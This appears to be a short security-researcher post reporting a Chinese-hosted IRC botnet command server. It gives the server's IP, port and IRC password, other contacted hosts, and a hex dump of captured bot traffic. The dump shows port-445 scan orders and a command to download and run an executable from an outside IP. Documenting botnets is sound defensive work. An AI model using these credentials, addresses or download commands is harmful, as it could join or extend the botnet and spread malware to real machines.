Owned Security: 115.239.230.73(irc botnet hosted in China Zhejiang Ninbo Lanzhong Network Ltd)

Remote Host Port Number
115.239.230.73 6943 PASS laorosr
213.251.170.52 80
31.184.237.43 80
98.126.35.112 80

MODE [N00_USA_XP_1295223]
@ -ix
00000000 | 5041 5353 206C 616F 726F 7372 0D0A 5052 | PASS laorosr..PR
00000010 | 5256 4D53 4720 5B4E 3030 5F55 5341 5F58 | RVMSG [N00_USA_X
00000020 | 505F 3132 3935 BCB9 4020 3A20 5261 6E64 | P_1295..@ : Rand
00000030 | 6F6D 2050 6F72 7420 5363 616E 2073 7461 | om Port Scan sta
00000040 | 7274 6564 206F 6E20 3137 342E 3133 332E | rted on 174.133.
00000050 | 782E 783A 3434 3520 7769 7468 2061 2064 | x.x:445 with a d
00000060 | 656C 6179 206F 6620 3520 7365 636F 6E64 | elay of 5 second
00000070 | 7320 666F 7220 3020 6D69 6E75 7465 7320 | s for 0 minutes
00000080 | 7573 696E 6720 3235 2074 6872 6561 6473 | using 25 threads
00000090 | 2E0D 0A50 5252 564D 5347 205B 4E30 305F | ...PRRVMSG [N00_
000000A0 | 5553 415F 5850 5F31 3239 35BC B940 203A | USA_XP_1295..@ :
000000B0 | 2053 6571 7565 6E74 6961 6C20 506F 7274 | Sequential Port
000000C0 | 2053 6361 6E20 7374 6172 7465 6420 6F6E | Scan started on
000000D0 | 2031 3932 2E31 3638 2E30 2E30 3A34 3435 | 192.168.0.0:445
000000E0 | 2077 6974 6820 6120 6465 6C61 7920 6F66 | with a delay of
000000F0 | 2035 2073 6563 6F6E 6473 2066 6F72 2030 | 5 seconds for 0
00000100 | 206D 696E 7574 6573 2075 7369 6E67 2032 | minutes using 2
00000110 | 3020 7468 7265 6164 732E 0D0A 5052 5256 | 0 threads...PRRV
00000120 | 4D53 4720 5B4E 3030 5F55 5341 5F58 505F | MSG [N00_USA_XP_
00000130 | 3132 3935 BCB9 4020 3A20 5365 7175 656E | 1295..@ : Sequen
00000140 | 7469 616C 2050 6F72 7420 5363 616E 2073 | tial Port Scan s
00000150 | 7461 7274 6564 206F 6E20 3139 322E 3136 | tarted on 192.16
00000160 | 382E 3632 2E30 3A34 3435 2077 6974 6820 | 8.62.0:445 with
00000170 | 6120 6465 6C61 7920 6F66 2035 2073 6563 | a delay of 5 sec
00000180 | 6F6E 6473 2066 6F72 2030 206D 696E 7574 | onds for 0 minut
00000190 | 6573 2075 7369 6E67 2032 3020 7468 7265 | es using 20 thre
000001A0 | 6164 732E 0D0A 5052 5256 4D53 4720 5B4E | ads...PRRVMSG [N
000001B0 | 3030 5F55 5341 5F58 505F 3132 3935 BCB9 | 00_USA_XP_1295..
000001C0 | 4020 3A20 5365 7175 656E 7469 616C 2050 | @ : Sequential P
000001D0 | 6F72 7420 5363 616E 2073 7461 7274 6564 | ort Scan started
000001E0 | 206F 6E20 3139 322E 302E 302E 303A 3434 | on 192.0.0.0:44
000001F0 | 3520 7769 7468 2061 2064 656C 6179 206F | 5 with a delay o
00000200 | 6620 3520 7365 636F 6E64 7320 666F 7220 | f 5 seconds for
00000210 | 3020 6D69 6E75 7465 7320 7573 696E 6720 | 0 minutes using
00000220 | 3130 2074 6872 6561 6473 2E0D 0A4B 4349 | 10 threads...KCI
00000230 | 4B20 5B4E 3030 5F55 5341 5F58 505F 3132 | K [N00_USA_XP_12
00000240 | 3935 3232 335D 18E7 400D 0A72 7373 7220 | 95223]..@..rssr
00000250 | 5350 322D 3238 3520 2A20 3020 3A43 4F4D | SP2-285 * 0 :COM
00000260 | 5055 5445 524E 414D 450D 0A73 656E 6420 | PUTERNAME..send
00000270 | 236A 2C23 4D61 206F 6F6F 6F0D 0A50 5252 | #j,#Ma oooo..PRR
00000280 | 564D 5347 2023 6920 3A48 5454 5020 5345 | VMSG #i :HTTP SE
00000290 | 5420 6874 7470 3A2F 2F33 312E 3138 342E | T http://31.184.
000002A0 | 3233 372E 3433 2F35 356D 732E 6578 650D | 237.43/55ms.exe.
000002B0 | 0A50 5252 564D 5347 205B 4E30 305F 5553 | .PRRVMSG [N00_US
000002C0 | 415F 5850 5F31 3239 35BC B940 203A 2052 | A_XP_1295..@ : R
000002D0 | 616E 646F 6D20 506F 7274 2053 6361 6E20 | andom Port Scan
000002E0 | 7374 6172 7465 6420 6F6E 2031 3734 2E78 | started on 174.x
000002F0 | 2E78 2E78 3A34 3435 2077 6974 6820 6120 | .x.x:445 with a
00000300 | 6465 6C61 7920 6F66 2035 2073 6563 6F6E | delay of 5 secon
00000310 | 6473 2066 6F72 2030 206D 696E 7574 6573 | ds for 0 minutes
00000320 | 2075 7369 6E67 2032 3520 7468 7265 6164 | using 25 thread
00000330 | 732E 0D0A | s...

hosting infos:
http://whois.domaintools.com/115.239.230.73